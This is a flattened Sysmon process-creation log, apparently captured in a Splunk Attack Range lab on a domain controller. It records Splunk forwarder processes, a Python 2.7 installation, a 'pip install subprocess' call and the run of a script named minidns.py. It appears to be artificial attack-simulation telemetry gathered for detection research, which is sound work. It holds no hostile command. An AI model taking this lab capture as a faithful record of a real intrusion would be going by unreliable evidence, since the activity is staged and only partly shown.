Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:52:20.404{A8622C2F-5324-6078-A107-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042668Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:19.752{A8622C2F-5323-6078-A007-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:17.737{A8622C2F-5321-6078-9F07-00000000AE01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:17.066{A8622C2F-5321-6078-9E07-00000000AE01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:16.420{A8622C2F-5320-6078-9D07-00000000AE01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000042207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:51.948{A8622C2F-5307-6078-9C07-00000000AE01}6964C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.41.481629615\700335798" -childID 6 -isForBrowser -prefsHandle 1896 -prefMapHandle 3764 -prefsLen 13178 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 7600 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000042108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:32.687{A8622C2F-52F4-6078-9B07-00000000AE01}4256C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip.exe" install subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-52F4-6078-9A07-00000000AE01}4420C:\Python27\Scripts\pip.exepip install subprocess 154100x800000000000000042100Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:32.674{A8622C2F-52F4-6078-9A07-00000000AE01}4420C:\Python27\Scripts\pip.exe-----pip install 
subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000042078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:22.930{A8622C2F-52EA-6078-9907-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:21.008{A8622C2F-52E9-6078-9807-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042055Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:51:20.330{A8622C2F-52E8-6078-9707-00000000AE01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:19.737{A8622C2F-52E7-6078-9607-00000000AE01}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042034Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:17.737{A8622C2F-52E5-6078-9507-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:17.060{A8622C2F-52E5-6078-9407-00000000AE01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042016Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:16.559{A8622C2F-52E4-6078-9307-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000041957Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.587{A8622C2F-52D6-6078-9207-00000000AE01}2476C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft 
Corporationhostname.exehostname -I C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-52D6-6078-9107-00000000AE01}1800C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000041949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.579{A8622C2F-52D6-6078-9107-00000000AE01}1800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'"C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-52D6-6078-9007-00000000AE01}6272C:\Python27\python.exec:\Python27\python.exe minidns.py 154100x800000000000000041941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.534{A8622C2F-52D6-6078-9007-00000000AE01}6272C:\Python27\python.exe-----c:\Python27\python.exe minidns.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000041927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:58.589{A8622C2F-52D2-6078-8F07-00000000AE01}6364C:\Python27\python.exe-----c:\Python27\python.exe 
minidns.py\C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000041740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:44.698{A8622C2F-52C4-6078-8A07-00000000AE01}4416C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000041731Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:44.665{A8622C2F-52C4-6078-8907-00000000AE01}4752C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
154100x800000000000000040799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:39.137{A8622C2F-52BF-6078-8707-00000000AE01}6128C:\Python27\python.exe-----"C:\Python27\python.exe" -m ensurepip -U --default-pipC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-52BF-6078-8607-00000000AE01}3008C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3498711333DBB15B306BB85B274C0C71 154100x800000000000000040789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:39.091{A8622C2F-52BF-6078-8607-00000000AE01}3008C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3498711333DBB15B306BB85B274C0C71C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:33.981{A8622C2F-52B9-6078-8507-00000000AE01}3780C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 
3B3EC1640C4D80CDBF88A89468165DC7C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040582Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:32.916{A8622C2F-52B8-6078-8407-00000000AE01}4424C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 442511D5F0042368B9A16B35ED61948C CC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:29.761{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000040508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:50:29.442{A8622C2F-52B5-6078-8207-00000000AE01}2644C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Administrator\Downloads\python-2.7.18.amd64.msi" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000040485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:22.920{A8622C2F-52AE-6078-8107-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:21.188{A8622C2F-52AD-6078-8007-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:20.522{A8622C2F-52AC-6078-7F07-00000000AE01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:19.846{A8622C2F-52AB-6078-7E07-00000000AE01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:50:17.888{A8622C2F-52A9-6078-7D07-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040424Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:17.211{A8622C2F-52A9-6078-7C07-00000000AE01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040415Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:16.545{A8622C2F-52A8-6078-7B07-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
